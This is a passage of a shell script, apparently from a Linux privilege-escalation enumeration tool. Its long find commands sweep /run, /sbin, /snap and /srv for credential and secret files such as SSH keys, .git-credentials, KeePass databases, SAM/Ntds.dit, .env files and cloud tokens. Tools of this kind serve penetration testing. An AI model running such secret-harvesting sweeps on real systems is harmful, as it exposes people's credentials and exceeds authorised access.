\".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SBIN=`eval_bckgrd "find /sbin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SBIN=`eval_bckgrd "find /sbin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SNAP=`eval_bckgrd "find /snap -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SNAP=`eval_bckgrd "find /snap -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SRV=`eval_bckgrd "find /srv -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" 